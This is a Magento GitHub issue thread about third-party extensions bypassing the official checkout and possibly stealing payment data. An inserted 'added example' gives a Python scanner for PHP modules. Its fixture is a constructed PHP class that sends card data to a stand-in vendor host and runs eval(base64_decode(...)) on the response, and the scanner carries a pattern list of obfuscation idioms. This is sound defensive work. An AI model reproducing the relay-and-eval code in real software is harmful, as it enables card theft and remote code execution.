magento / community-features

Magento Features Development is an initiative to allow community members to join the development of Magento features

Force all extensions to use 1 payment gateway endpoint #187

Open elieobeid7 opened 5 years ago

elieobeid7 commented 5 years ago

My client wants to use Mastercard's payment gateway (MPGS) provided by his bank. Magento has a free extension for that. In my country, Stripe and PayPal don't work.

My client bought third-party extensions from a company; the extensions integrate with PayPal and Stripe. When we told them that we were going to use MPGS, they wanted to charge more in order to customize their extensions to use it.

You see, I could easily integrate MPGS into Magento, and yet an extension developer is able to force me to pay him because he can redirect users to a payment gateway associated with his extensions. I'm so pissed that I have to pay him. I'm furious. It seems to me that Magento extension developers are able to blackmail users for every little functionality.

But more importantly, this is a security issue: it means that every extension you install might be stealing your payment info, every single one of them.

My request is:

Don't allow any extension to manipulate the checkout page or the payment gateway, other than a select few that you approve. That way at least one knows that no matter what an extension does, it cannot steal the payment information or alter the payment process.

Like force all payments to go through example.com/checkout,

where checkout is the official checkout endpoint created by Magento.

First security rule: don't trust anyone. Here I'm forced to trust everyone. For the payment part at least, at least for that, I would like to trust Magento. We bought 42 extensions from the vendor and in like 5 we have to configure payment gateways.

I mean, who knows, maybe 5 years from now the extension vendor goes bankrupt and starts needing more money, so he starts stealing some percentage of every purchase.

elieobeid7 commented 5 years ago

I'm trying to use a booking module. It comes with its own payment configuration, so in other words, for the price of using a booking module, the developer forced me to use his payment system, and if I want to add MPGS I have to pay him.

That's what's pissing me off, and that's why I want the payment gateway to be standardized, so that a booking system module won't be able to bypass Magento's checkout.

cjnewbs commented 5 years ago

I'm so pissed that I have to pay him. I'm furious. It seems to me that magento extension developers are able to blackmail users for every little functionality.

This is not blackmail. Unless I'm very much mistaken, the extension you chose to use does not contain the functionality you require. Perhaps a simpler solution would be to find a payment module that actually fulfils your requirements before purchasing it.

But more importantly. this is a security issue, it means that every extension you install might be stealing your payment info, every single one of them.

Yes, this is always a risk. You should always audit any third-party code you use.

Don't allow any extension to manipulate the checkout page or the payment gateway. Other than a select few, that you approve. That way at least one knows that no matter what an extension does, it cannot steal the payment information or alter the payment process.

Magento is an incredibly flexible framework/application and its success comes from allowing developers to extend and modify behaviour as required. Countless merchants require customisations to the checkout due to business requirements. Most payment modules I have come across communicate directly with the bank/payment processor they provide functionality for. If your chosen module connects to a server run by the module developer, which then connects to the bank, I see that as a HUGE red flag. I don't know the exact details of your situation, but that seems like an additional step that is not required.
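As an added example (not code from this issue thread, from Magento, or from any vendor named here), this is the kind of quick static triage the two points above call for: "audit any third-party code you use", and treat a module that sends payment data to the vendor's own server before the processor as a red flag. It lists every hostname a module's PHP files reference, flags any outside an allowlist of processors the shop actually agreed to use, and flags PHP idioms that commonly hide backdoors (eval over base64-decoded data). The module files, the vendor name "Vendor_Booking", the host "relay.vendor-example.test" and the allowlist are all constructed for illustration.

```python
"""Static triage of a third-party Magento module's PHP source (added example).

Reports hostnames referenced outside an allowlist, plus obfuscation idioms.
Everything below (module files, allowlist, vendor host) is constructed."""
import re
from typing import Dict, List, Set

# Assumed allowlist (hypothetical): the processors this shop has agreed to use.
ALLOWED_HOSTS: Set[str] = {
    "api.stripe.com",
    "api.paypal.com",
}

# Quoted dotted literals that are really file names, e.g. 'config.xml'.
FILE_EXTENSIONS = {"php", "phtml", "xml", "js", "css", "html", "json", "csv", "txt"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
QUOTED_DOTTED_RE = re.compile(r"""['"]([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)['"]""")
SUSPICIOUS_CALL_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|create_function)\s*\("
)


def extract_hosts(php_source: str) -> Set[str]:
    """Hostnames referenced in PHP source: inside URLs or as bare quoted literals."""
    hosts = {h.lower() for h in URL_RE.findall(php_source)}
    for literal in QUOTED_DOTTED_RE.findall(php_source):
        last = literal.rsplit(".", 1)[-1].lower()
        # Keep only things shaped like a domain, not version strings or file names.
        if last.isalpha() and len(last) >= 2 and last not in FILE_EXTENSIONS:
            hosts.add(literal.lower())
    return hosts


def find_suspicious_calls(php_source: str) -> List[str]:
    """Sorted, de-duplicated names of obfuscation/backdoor idioms found."""
    return sorted(set(SUSPICIOUS_CALL_RE.findall(php_source)))


def scan_module(files: Dict[str, str], allowed: Set[str]) -> Dict[str, Dict[str, List[str]]]:
    """Map each file that has a finding to its unexpected hosts and suspicious calls."""
    findings: Dict[str, Dict[str, List[str]]] = {}
    for path, source in files.items():
        hosts = sorted(h for h in extract_hosts(source) if h not in allowed)
        calls = find_suspicious_calls(source)
        if hosts or calls:
            findings[path] = {"hosts": hosts, "calls": calls}
    return findings


# Constructed module (hypothetical vendor "Vendor_Booking"), not a real extension.
MODULE_FILES: Dict[str, str] = {
    "Model/Gateway/Stripe.php": r"""<?php
namespace Vendor\Booking\Model\Gateway;
class Stripe {
    const ENDPOINT = 'https://api.stripe.com/v1/charges';
    public function charge(array $card) {
        $ch = curl_init(self::ENDPOINT);          // talks to the processor directly
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($card));
        return curl_exec($ch);
    }
}
""",
    "Model/Gateway/Relay.php": r"""<?php
namespace Vendor\Booking\Model\Gateway;
class Relay {
    private $relay = 'https://relay.vendor-example.test/collect';
    public function charge(array $card) {
        $ch = curl_init($this->relay);            // card data goes to the vendor first
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($card));
        $response = curl_exec($ch);
        eval(base64_decode($response));           // and the vendor can run code here
        return $response;
    }
}
""",
    "etc/config.xml": "<config><default><payment><booking_relay>"
                      "<active>1</active></booking_relay></payment></default></config>",
}

if __name__ == "__main__":
    for path, finding in scan_module(MODULE_FILES, ALLOWED_HOSTS).items():
        print(f"{path}: unexpected hosts={finding['hosts']} suspicious calls={finding['calls']}")
```

Run against a real module, point `MODULE_FILES` at the contents of `app/code/<Vendor>/<Module>` (or the Composer package under `vendor/`). Treat the result as triage, not proof: a host assembled by string concatenation, read from a remote config, or resolved at runtime will not appear, so pair this with egress monitoring on the web server (outbound DNS or proxy logs) to see where the module actually sends data during a test checkout.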

elieobeid7 commented 5 years ago

If you should audit every extension, that'd be a huge waste of time; besides, vendors don't give you the code before the purchase. If you want to purchase and then audit, first of all, your money is gone; secondly, I have 43 plugins, so it's faster to write my own store from scratch.

Each plugin costs at least $100, the average is $400. It'd be better to force these vendors to submit the code to Magento and have Magento take some money, like Apple. It's a win-win.

To make it even easier, don't allow sensitive permissions by default. If one wants to have those, he either modifies his own installation or buys a certified plugin that can do that.

Right now I'm using Webkul, the most famous extension vendor of all; he worked for airlines and Deloitte, and they gave him a reward. If Webkul can do such things to make more money, I'm not sure I can trust any extension developer, anyone.

The very, very least you can do is force a user review repository. Look:

https://wordpress.org/plugins/

9/10 WordPress plugins can be found here; if there's a problem, one can easily see it in the reviews.

In contrast, 9/10 Magento plugins are paid and sold by the vendor, therefore they have no reviews one can see, other than the stupid 5 stars that the vendor displays on his own website.

If WooCommerce got hacked, WordPress wouldn't care; they're a blogging system. Magento's whole business depends on selling stuff; the least they can do is ensure some security or review system for the plugins.

MellenIO commented 5 years ago

If you should audit every extension, that'd be a huge waste of time

If you believe that auditing a third-party extension from a (potentially) reputable provider will take more time than writing your own tested, compatible module, then that is what you should be doing.

besides vendors don't give you the code before the purchase.

No, they don't; it is their property.

Each plugin costs at least $100, the average is $400, it'd be better to force these vendors to submit the code to magento and magento take some money like apple, it's a win-win.

Most vendors also sell via the Magento Marketplace (marketplace.magento.com); see here & here for examples.

My client bought third party extensions from a company, the extensions integrate with PayPal and Stripe, when we told them that we're going to use MPGS they wanted to charge more in order to customize their extensions to use that.

It sounds like you're asking for functionality that isn't presently available in the extension, so they're charging you extra for the bespoke functionality.

You see, I could easily integrate MPGS into magento,

Then why don't you do it? That seems to stop this issue as it stands.

There will always be "rogue" modules & vendors as you're describing. This isn't limited to Magento; recently (maybe 3-4 months ago?), there was a theme for WordPress which I believe was outed as having numerous backdoors & "self-destruct switches" inside (I can't remember the link, so if anyone has it feel free to correct me). As you said, trust no one. That includes auditing premium extensions.

elieobeid7 commented 5 years ago

You see, I could easily integrate MPGS into magento,

Because the extension developer does not respect the official Magento payment gateway endpoint, which has been my request in this issue all along: pick an endpoint, for example example.com/checkout, which all users must go to when they want to buy something, and it should belong to Magento.

I said that by bypassing the default endpoint, an extension is able to force you to pay for something that is free, and is creating a security vulnerability.

What's the point of auditing something if you can only audit it after purchase? How are you going to get your money back? Auditing should take place before users get scammed.

Also, imagine Google telling people to inspect the source code of every app they download, or WordPress telling users to inspect all the code of all extensions and blaming them if things go wrong. That's nonsense; no one would use them. You're asking people to become Magento developers before using Magento. That's what you're saying: "Sorry, if you're not a Magento certified developer, then this platform isn't for you."